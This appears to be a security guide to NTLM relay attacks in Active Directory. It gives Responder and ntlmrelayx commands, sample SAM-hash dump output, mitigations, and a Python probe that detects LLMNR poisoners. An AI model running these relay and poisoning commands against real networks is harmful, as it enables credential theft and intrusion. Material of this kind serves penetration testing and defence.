NTLM Relay Attacks in 2026
0x00 - Executive Summary
Despite modern defenses, NTLM Relay remains a critical threat in 2026. This guide provides a complete, step-by-step walkthrough of how to intercept and relay authentication requests in an Active Directory environment to achieve Remote Code Execution (RCE) or Privilege Escalation.
0x01 - Prerequisites & Tooling
To follow this guide, ensure your lab meets the following requirements:
- Attacker Machine: Kali Linux (Updated).
- Environment: Active Directory Domain with at least one Windows Server/Workstation where SMB Signing is NOT enforced.
- Tools:
  - Responder: For LLMNR/NBT-NS/mDNS poisoning.
  - Impacket (ntlmrelayx): For the core relay engine.
0x02 - The Theory: Why it still works
The core of the issue is that NTLM provides no mutual authentication: the client never verifies the identity of the server it is authenticating to, so a man-in-the-middle can forward the client's NTLM messages to a different server. As long as that target does not require SMB Signing, it has no way to tell the forwarded session from a genuine one and accepts the relayed session as legitimate.
0x03 - Step-by-Step Execution
Step 1: Network Poisoning
We start by capturing broadcast traffic. Run Responder to listen for LLMNR, NBT-NS, and mDNS requests.
sudo responder -I eth0 -dwv
Step 2: Configuring the Relay
In a second terminal, set up ntlmrelayx.py. We will target a specific IP and attempt to dump the local SAM database upon successful relay.
python3 ntlmrelayx.py -t smb://192.168.1.150 -smb2support
Step 3: Triggering the Victim
The attack completes when a victim attempts to access a network share whose name does not resolve in DNS. The Windows client then falls back to LLMNR/NBT-NS broadcast name resolution, Responder answers the request as if it were the requested host, and the victim's SMB connection, together with its NTLM authentication, arrives at the attacker's listener for ntlmrelayx to forward to the target.
0x04 - Proof of Concept (PoC)
Once the relay is successful, the tool automatically executes the secretsdump routine:
[*] SMBD-Relay: Connection from 192.168.1.50 controlled.
[*] Targeting: smb://192.168.1.150
[+] Authenticating as DOMAIN\VictimUser...
[+] Authentication Successful! Dumping local SAM hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done! Check /tmp/ngr3p_hashes.txt for full logs.
0x05 - Offense informs Defense
To mitigate this attack, the most effective measures are:
- Enable SMB Signing: Set 'Require' for both Client and Server communications. A relayed session cannot compute the session key needed to sign traffic, so the target rejects it.
- Disable Legacy Protocols: Turn off LLMNR and NetBIOS over TCP/IP, so that a failed DNS lookup no longer falls back to a broadcast that a poisoner can answer.
- EPA: Enable Extended Protection for Authentication on sensitive services. Channel binding ties the NTLM authentication to the TLS channel the client established, so an authentication relayed over a different channel fails.
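A detection check added here that is not part of the original guide: on segments where LLMNR cannot yet be disabled, an LLMNR query for a name no legitimate host owns should never be answered, so any reply identifies a poisoner such as the Responder instance from Step 1 (the same canary idea works for NBT-NS, which the code does not cover). It assumes Python 3.8+ with only the standard library; the function names and the SAMPLE_POISONED_REPLY bytes are constructed for this example, not captured traffic.

```python
import random, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # LLMNR multicast group and port (RFC 4795)
SAMPLE_POISONED_REPLY = (b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00\x06canary\x00\x00\x01\x00\x01"  # constructed sample, not captured: id 0x1234, QR=1, question canary A IN
                         b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\xc0\xa8\x01\x42")  # answer: pointer to question name, A, TTL 30, 192.168.1.66

def build_llmnr_query(name: str, txid: int) -> bytes:
    # Single-label A query; LLMNR reuses the DNS wire format (flags 0 = standard query, QTYPE A, QCLASS IN)
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + bytes([len(name)]) + name.encode() + b"\x00" + struct.pack("!HH", 1, 1)

def _skip_name(data: bytes, off: int) -> int:
    # A name is either a 2-byte compression pointer or length-prefixed labels ending in 0x00
    if (data[off] & 0xC0) == 0xC0:
        return off + 2
    while data[off]:
        off += data[off] + 1
    return off + 1

def parse_llmnr_answer(data: bytes, txid: int) -> list:
    # IPv4 addresses in a response to txid; [] for non-matching or malformed packets
    try:
        rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
        if rid != txid or not (flags & 0x8000):      # QR bit set = this is a response
            return []
        off, addrs = 12, []
        for _ in range(qd):                           # skip the echoed question + QTYPE/QCLASS
            off = _skip_name(data, off) + 4
        for _ in range(an):
            off = _skip_name(data, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            if rtype == 1 and rdlen == 4:             # A record: RDATA is the claimed IPv4 address
                addrs.append(socket.inet_ntoa(data[off + 10:off + 14]))
            off += 10 + rdlen
        return addrs
    except (struct.error, IndexError):
        return []

def probe_for_poisoner(name: str = "canary-does-not-exist", timeout: float = 2.0) -> list:
    # Ask the segment for a name nobody owns; every (responder_ip, addresses) pair returned is a poisoner
    txid, hits = random.randrange(1, 0xFFFF), []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:                               # collect every reply until the timeout expires
                data, (src, _) = sock.recvfrom(512)
                if answers := parse_llmnr_answer(data, txid):
                    hits.append((src, answers))
        except socket.timeout:
            pass
    return hits
```

Run probe_for_poisoner() periodically from a host on each segment and alert on a non-empty result; with Responder from Step 1 active, the returned address is the attacker's listener.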